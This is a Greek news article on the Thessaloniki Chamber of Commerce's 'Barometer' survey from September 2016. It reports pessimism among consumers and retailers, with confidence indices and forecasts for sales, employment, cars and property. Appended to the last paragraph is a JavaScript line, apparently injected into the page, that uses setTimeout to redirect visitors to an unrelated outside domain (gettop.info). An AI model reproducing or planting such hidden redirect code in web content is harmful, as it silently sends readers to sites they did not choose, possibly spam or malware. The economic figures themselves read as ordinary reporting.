ΕΒΕΘ: Απαισιόδοξοι έμποροι και καταναλωτές στη Θεσσαλονίκη

0
16

 

Την απαισιοδοξία για το μέλλων των επιχειρηματιών και καταναλωτών στον νομό Θεσσαλονίκης αποτυπώνει η έρευνα «Βαρόμετρο του ΕΒΕΘ», που διενεργήθηκε κατά το δεύτερο δεκαπενθήμερο του Σεπτεμβρίου 2016.

Σύμφωνα με τα ευρήματα της έρευνας, το 42% των καταναλωτών ζουν «τραβώντας» χρήματα από τις αποταμιεύσεις τους και εμφανίζονται απρόθυμοι για οποιαδήποτε σημαντική αγορά.

Παρά την απαισιοδοξία, θετικές εξελίξεις διαφαίνονται στο «μέτωπο» της βιομηχανίας και των υπηρεσιών.

Αναλυτικά, αρκετά απαισιόδοξοι εμφανίζονται οι καταναλωτές στον νομό Θεσσαλονίκης, καθώς ο δείκτης καταναλωτικής εμπιστοσύνης διαμορφώνεται στις -52 μονάδες, σε καλύτερο ωστόσο επίπεδο σε σχέση με τον αντίστοιχο εθνικό (-66 μονάδες). Οι Θεσσαλονικείς δηλώνουν ότι η κακή οικονομική τους κατάσταση διατηρήθηκε, με σημαντική ενίσχυση της απαισιοδοξίας -σε σχέση με την προηγούμενη έρευνα- για την περαιτέρω εξέλιξή της. Παραμένουν δε απαισιόδοξοι για την εξέλιξη της ανεργίας στη χώρα, παρότι η απαισιοδοξία τους είναι αρκετά μικρότερη, σε σχέση με τον μέσο όρο της χώρας.

Οι κάτοικοι του νομού δηλώνουν σταθερή απροθυμία για την πραγματοποίηση σημαντικών αγορών στο παρόν και το μέλλον, ενώ πολύ χαμηλή είναι η πρόθεσή τους για αποταμίευση (το 42% των ερωτηθέντων, έναντι 39% τον Μάρτιο, δηλώνει ότι «τραβάει» από τις αποταμιεύσεις ή χρεώνεται όλο και περισσότερο, ενώ το 47%, έναντι 49% τον Μάρτιο, δηλώνει ότι τα φέρνει πέρα ίσα- ίσα με τα εισοδήματά του).

Σταθερή παραμένει η πρόβλεψη των καταναλωτών για παράταση της καθίζησης των πωλήσεων στην αγορά αυτοκινήτου στο επόμενο 12μηνο, ενώ από τις εκτιμήσεις τους για το επόμενο διάστημα επιβεβαιώνεται η ολοκληρωτική καθήλωση της αγοράς ακινήτων και της οικοδομικής δραστηριότητας γενικότερα και, επιπλέον, περαιτέρω επιδείνωση στον τομέα των ανακαινίσεων ή/και επισκευών-βελτιώσεων σπιτιών.

Από την πλευρά των επιχειρηματιών, σε σταθερά αρνητικό επίπεδο, αλλά με ελαφρά βελτίωση σε σύγκριση με τον Μάρτιο, παραμένει ο «Δείκτης Επιχειρηματικών Προσδοκιών για το Λιανικό Εμπόριο» στον νομό. Ο αντίστοιχος εθνικός δείκτης εμφανίζει, ωστόσο, εντυπωσιακή βελτίωση. Συγκεκριμένα, το ισοζύγιο θετικών – αρνητικών εκτιμήσεων του «Δείκτη Επιχειρηματικών Προσδοκιών Λιανικού Εμπορίου» στον νομό διαμορφώνεται στις -20 μονάδες (από -26 μονάδες τον Μάρτιο), έναντι +15 (από +3 μονάδες τον Μάρτιο) σε εθνικό επίπεδο.

Σταθερή απαισιοδοξία καταγράφεται αναφορικά με την εξέλιξη των πωλήσεων και των παραγγελιών κατά το επόμενο 6μηνο. Μείωση της απασχόλησης και των τιμών των προϊόντων προβλέπεται για το αμέσως επόμενο διάστημα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here